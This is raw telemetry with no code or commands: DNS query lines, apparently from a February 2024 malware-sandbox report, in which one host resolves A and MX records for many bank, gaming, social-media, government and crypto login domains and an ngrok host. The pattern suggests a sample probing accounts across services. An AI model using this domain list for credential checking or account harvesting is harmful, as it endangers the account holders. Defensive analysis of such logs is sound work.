                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.341257095 CET192.168.2.61.1.1.10x25f7Standard query (0)www2.personas.santander.com.arMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.341491938 CET192.168.2.61.1.1.10x7231Standard query (0)cloud.simplify3d.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.341784000 CET192.168.2.61.1.1.10xe1caStandard query (0)mojadovera.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.342101097 CET192.168.2.61.1.1.10x72baStandard query (0)sigapbanjarmasin.infoMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.342314959 CET192.168.2.61.1.1.10x6053Standard query (0)netcsomagom.dpd.huMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.342569113 CET192.168.2.61.1.1.10xc850Standard query (0)m.sellercenter.lazada.com.myMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.342866898 CET192.168.2.61.1.1.10x70abStandard query (0)pl-pl.facebook.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.344408035 CET192.168.2.61.1.1.10x8e1fStandard query (0)sistemas.pa.gov.brMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.384812117 CET192.168.2.61.1.1.10x1586Standard query (0)app.plex.tvMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.384864092 CET192.168.2.61.1.1.10xedaStandard query (0)auth.riotgames.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.385155916 CET192.168.2.61.1.1.10x6163Standard query (0)v.xsanime.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.385193110 CET192.168.2.61.1.1.10x3291Standard query (0)instructory.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.385426044 CET192.168.2.61.1.1.10x3592Standard query (0)academico.um.edu.mxMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.385694981 CET192.168.2.61.1.1.10x9d35Standard query (0)followerstiktok.xyzMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.414465904 CET192.168.2.61.1.1.10x2747Standard query (0)nossoplayer.meMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.414526939 CET192.168.2.61.1.1.10x3618Standard query (0)tls21.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.414639950 CET192.168.2.61.1.1.10xa84dStandard query (0)ssl-es.hoteles.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.414674044 CET192.168.2.61.1.1.10xdaf3Standard query (0)vidcorn.tvMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.414778948 CET192.168.2.61.1.1.10xccd7Standard query (0)es-la.facebook.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.414844036 CET192.168.2.61.1.1.10x5f5eStandard query (0)poligrafosecuador.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.414932966 CET192.168.2.61.1.1.10x3d60Standard query (0)idp.uitgeverij-deviant.nlMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.415003061 CET192.168.2.61.1.1.10x91aaStandard query (0)secure.vexcorp.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.415082932 CET192.168.2.61.1.1.10x65f3Standard query (0)21dukes.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.415169954 CET192.168.2.61.1.1.10x899fStandard query (0)ventas.officeinsumos.com.arMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.415205002 CET192.168.2.61.1.1.10xf971Standard query (0)eei.uniandes.edu.coMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.415342093 CET192.168.2.61.1.1.10xc68bStandard query (0)servicossociais.caixa.gov.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.415373087 CET192.168.2.61.1.1.10xdd03Standard query (0)nuevopacto.runacode.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.415520906 CET192.168.2.61.1.1.10xe5daStandard query (0)accounts.snapchat.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.415550947 CET192.168.2.61.1.1.10xb310Standard query (0)milogin.michigan.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.415678024 CET192.168.2.61.1.1.10x5d65Standard query (0)account.booking.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.415879011 CET192.168.2.61.1.1.10xb94bStandard query (0)accounts.binance.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.415977955 CET192.168.2.61.1.1.10x4bf7Standard query (0)discord.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.416142941 CET192.168.2.61.1.1.10x2c0Standard query (0)innovationdevelopment.euMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.423826933 CET192.168.2.61.1.1.10x27fdStandard query (0)hi-in.facebook.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.424328089 CET192.168.2.61.1.1.10x3731Standard query (0)pt.secure.imvu.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.728462934 CET192.168.2.61.1.1.10x9d35Standard query (0)followerstiktok.xyzMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.761837959 CET192.168.2.61.1.1.10x27fdStandard query (0)hi-in.facebook.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.761837959 CET192.168.2.61.1.1.10x2c0Standard query (0)innovationdevelopment.euMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.761878967 CET192.168.2.61.1.1.10x899fStandard query (0)ventas.officeinsumos.com.arMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.943648100 CET192.168.2.61.1.1.10x84aaStandard query (0)brasilliker.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.945614100 CET192.168.2.61.1.1.10xa1b1Standard query (0)lookaside.fbsbx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.946130991 CET192.168.2.61.1.1.10x3ffStandard query (0)multiideas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.947258949 CET192.168.2.61.1.1.10x6c55Standard query (0)us04web.zoom.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.950478077 CET192.168.2.61.1.1.10x9919Standard query (0)opsu.terna.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.066040993 CET192.168.2.61.1.1.10xd5feStandard query (0)sii.itzacatepec.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.066040993 CET192.168.2.61.1.1.10x96a5Standard query (0)0260049m.index-education.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.066323042 CET192.168.2.61.1.1.10x19eStandard query (0)upsconline.nic.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.066910028 CET192.168.2.61.1.1.10xafd3Standard query (0)rage.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.066910028 CET192.168.2.61.1.1.10x552dStandard query (0)servicios.sat.gob.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.074903011 CET192.168.2.61.1.1.10xfbeStandard query (0)store.steampowered.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.074903011 CET192.168.2.61.1.1.10xe06eStandard query (0)m.codere.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.198466063 CET192.168.2.61.1.1.10x1b9bStandard query (0)accounts.faceit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.199054003 CET192.168.2.61.1.1.10x4e7fStandard query (0)kamgarsetu.mp.gov.inMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.199054956 CET192.168.2.61.1.1.10x4641Standard query (0)sii.ittlahuac.edu.mxMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.199369907 CET192.168.2.61.1.1.10xef85Standard query (0)accounts.ecitizen.go.keA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.199930906 CET192.168.2.61.1.1.10x5163Standard query (0)3fba-180-252-166-236.ngrok.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.199930906 CET192.168.2.61.1.1.10x6b19Standard query (0)ucivirtual.uci.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.199930906 CET192.168.2.61.1.1.10xbf62Standard query (0)money-farm.ccA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.263773918 CET192.168.2.61.1.1.10xedd7Standard query (0)es-la.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.264864922 CET192.168.2.61.1.1.10x7f06Standard query (0)midetuvelocidad.claro.com.peA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.264866114 CET192.168.2.61.1.1.10xa4e3Standard query (0)pan.baidu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.264866114 CET192.168.2.61.1.1.10xe83aStandard query (0)zarkana2.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.270052910 CET192.168.2.61.1.1.10xaa09Standard query (0)naukrigulf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.374720097 CET192.168.2.61.1.1.10x840bStandard query (0)ro.bongacams.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.374799967 CET192.168.2.61.1.1.10xfc85Standard query (0)idp.uitgeverij-deviant.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.382895947 CET192.168.2.61.1.1.10xc4e8Standard query (0)student.emis.gov.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.406208038 CET192.168.2.61.1.1.10xc850Standard query (0)m.sellercenter.lazada.com.myMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.406208038 CET192.168.2.61.1.1.10x6b44Standard query (0)signin.rockstargames.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.406666040 CET192.168.2.61.1.1.10x396aStandard query (0)genshin.mihoyo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.406666040 CET192.168.2.61.1.1.10xd5feStandard query (0)sii.itzacatepec.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.406812906 CET192.168.2.61.1.1.10x19eStandard query (0)upsconline.nic.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.407705069 CET192.168.2.61.1.1.10x2c8Standard query (0)signup2.br.leagueoflegends.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.407705069 CET192.168.2.61.1.1.10xa513Standard query (0)vidcorn.tvA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.447437048 CET192.168.2.61.1.1.10x718eStandard query (0)account.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.447437048 CET192.168.2.61.1.1.10x55a7Standard query (0)student.emis.gov.egMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.447437048 CET192.168.2.61.1.1.10xfc37Standard query (0)transaccional.saludtotal.com.coMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.527350903 CET192.168.2.61.1.1.10x35e8Standard query (0)mw.redsa.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.527704954 CET192.168.2.61.1.1.10xe06eStandard query (0)m.codere.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.528419018 CET192.168.2.61.1.1.10x5302Standard query (0)hero-wars.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.528419018 CET192.168.2.61.1.1.10x678dStandard query (0)s163-es.ogame.gameforge.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.529937029 CET192.168.2.61.1.1.10x15a1Standard query (0)oferta.senasofiaplus.edu.coMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.535510063 CET192.168.2.61.1.1.10x5320Standard query (0)virtuadopt.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.535510063 CET192.168.2.61.1.1.10x51f3Standard query (0)easygold.joyalukkas.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.536309004 CET192.168.2.61.1.1.10x9543Standard query (0)ov.edesur.com.doMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.536309004 CET192.168.2.61.1.1.10x82beStandard query (0)etd.lib.tuke.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.542638063 CET192.168.2.61.1.1.10xb22bStandard query (0)xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.542896986 CET192.168.2.61.1.1.10xef85Standard query (0)accounts.ecitizen.go.keA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.543354034 CET192.168.2.61.1.1.10xd8eeStandard query (0)mitextoescolar.mineduc.clMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.543354034 CET192.168.2.61.1.1.10x444aStandard query (0)ngoalongvn.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.543653965 CET192.168.2.61.1.1.10x482fStandard query (0)mega.nzMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.543718100 CET192.168.2.61.1.1.10xbf7eStandard query (0)phonandroid.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.544301033 CET192.168.2.61.1.1.10x626cStandard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.544301033 CET192.168.2.61.1.1.10x83c3Standard query (0)mobilsam.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.544547081 CET192.168.2.61.1.1.10x6bd5Standard query (0)mitextoescolar.mineduc.clA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.544673920 CET192.168.2.61.1.1.10xd3a0Standard query (0)us-smtp-inbound-2.mimecast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.550899982 CET192.168.2.61.1.1.10x3bcdStandard query (0)app.plex.tvA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.550899982 CET192.168.2.61.1.1.10x3eecStandard query (0)nossoplayer.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.553281069 CET192.168.2.61.1.1.10x2ac9Standard query (0)m.sellercenter.lazada.com.myA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.553281069 CET192.168.2.61.1.1.10xfa74Standard query (0)netcsomagom.dpd.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.567161083 CET192.168.2.61.1.1.10xd7d5Standard query (0)followerstiktok.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.567624092 CET192.168.2.61.1.1.10x968eStandard query (0)pl-pl.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.622559071 CET192.168.2.61.1.1.10x15a0Standard query (0)sistemas.pa.gov.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.622926950 CET192.168.2.61.1.1.10xe1b5Standard query (0)aeaaamorim.inovarmais.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.626209021 CET192.168.2.61.1.1.10xb6dbStandard query (0)auth.riotgames.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.626209021 CET192.168.2.61.1.1.10xe83aStandard query (0)zarkana2.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.626209021 CET192.168.2.61.1.1.10xa4e3Standard query (0)pan.baidu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.627357960 CET192.168.2.61.1.1.10xdc16Standard query (0)foros.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.627592087 CET192.168.2.61.1.1.10xdaa4Standard query (0)api.cmrsanmartin.ziz.clA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.627876997 CET192.168.2.61.1.1.10x9418Standard query (0)21dukes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.628273010 CET192.168.2.61.1.1.10x3cf3Standard query (0)web.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.628763914 CET192.168.2.61.1.1.10xccc9Standard query (0)app.jobpet.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.631333113 CET192.168.2.61.1.1.10x131dStandard query (0)kamgarsetu.mp.gov.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.631333113 CET192.168.2.61.1.1.10x1fe1Standard query (0)mw.redsa.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.631333113 CET192.168.2.61.1.1.10x880eStandard query (0)connect.appen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.631900072 CET192.168.2.61.1.1.10xbe2eStandard query (0)uh.isA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.632419109 CET192.168.2.61.1.1.10x6aedStandard query (0)iam.gov.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.632677078 CET192.168.2.61.1.1.10x69f3Standard query (0)hero-wars.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.632982016 CET192.168.2.61.1.1.10xcbe5Standard query (0)ssl-es.hoteles.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.634778976 CET192.168.2.61.1.1.10x8114Standard query (0)accounts.snapchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.634779930 CET192.168.2.61.1.1.10xfb46Standard query (0)tiktok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.635792017 CET192.168.2.61.1.1.10x242Standard query (0)instructory.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.635792017 CET192.168.2.61.1.1.10x4e2eStandard query (0)accounts.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.636231899 CET192.168.2.61.1.1.10x99b8Standard query (0)etd.lib.tuke.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.636368990 CET192.168.2.61.1.1.10x1f2bStandard query (0)xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.636990070 CET192.168.2.61.1.1.10xa88dStandard query (0)casinocontroller.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.636990070 CET192.168.2.61.1.1.10xf26cStandard query (0)transaccional.saludtotal.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.636990070 CET192.168.2.61.1.1.10x2427Standard query (0)srienlinea.sri.gob.ecA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.637382984 CET192.168.2.61.1.1.10x736fStandard query (0)accounts.binance.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.637761116 CET192.168.2.61.1.1.10xbcc0Standard query (0)mojadovera.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.637868881 CET192.168.2.61.1.1.10x9e86Standard query (0)auth.cambridgelms.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.638250113 CET192.168.2.61.1.1.10xf409Standard query (0)brasilliker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.638549089 CET192.168.2.61.1.1.10xda7aStandard query (0)ngoalongvn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.638549089 CET192.168.2.61.1.1.10xb755Standard query (0)pt.secure.imvu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.638549089 CET192.168.2.61.1.1.10xf381Standard query (0)phonandroid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.638919115 CET192.168.2.61.1.1.10x8981Standard query (0)hi-in.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.638919115 CET192.168.2.61.1.1.10xddf5Standard query (0)discord.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.639367104 CET192.168.2.61.1.1.10x4e92Standard query (0)kwyk.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.639826059 CET192.168.2.61.1.1.10x15Standard query (0)sii.ittlahuac.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.640388012 CET192.168.2.61.1.1.10x4a2bStandard query (0)zuhauseplus.vodafone.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.640388012 CET192.168.2.61.1.1.10xbd75Standard query (0)ventas.officeinsumos.com.arA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.641469955 CET192.168.2.61.1.1.10xde01Standard query (0)authenticate.riotgames.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.641469955 CET192.168.2.61.1.1.10x348fStandard query (0)netizion.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.641469955 CET192.168.2.61.1.1.10xf52aStandard query (0)contribuyente.seniat.gob.veA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.641572952 CET192.168.2.61.1.1.10x32b3Standard query (0)warriorplus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.641738892 CET192.168.2.61.1.1.10x1b2Standard query (0)login.adf.lyA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.642179966 CET192.168.2.61.1.1.10xf8a6Standard query (0)sigapbanjarmasin.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.642668962 CET192.168.2.61.1.1.10xe277Standard query (0)sport.autoplay.cloudA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.642668962 CET192.168.2.61.1.1.10x1093Standard query (0)mobilsam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.642668962 CET192.168.2.61.1.1.10x13f3Standard query (0)www2.personas.santander.com.arA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.642704964 CET192.168.2.61.1.1.10xcb21Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.643431902 CET192.168.2.61.1.1.10x3fa4Standard query (0)account.booking.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.643431902 CET192.168.2.61.1.1.10x11deStandard query (0)innovationdevelopment.euA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.643605947 CET192.168.2.61.1.1.10xb2d5Standard query (0)yellosa.co.zaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.645477057 CET192.168.2.61.1.1.10xfb54Standard query (0)secure.vexcorp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.645477057 CET192.168.2.61.1.1.10x6aaeStandard query (0)poligrafosecuador.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.645477057 CET192.168.2.61.1.1.10x991aStandard query (0)tls21.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.648389101 CET192.168.2.61.1.1.10x9633Standard query (0)service.uan.edu.coA (IP address)IN (0x0001)false
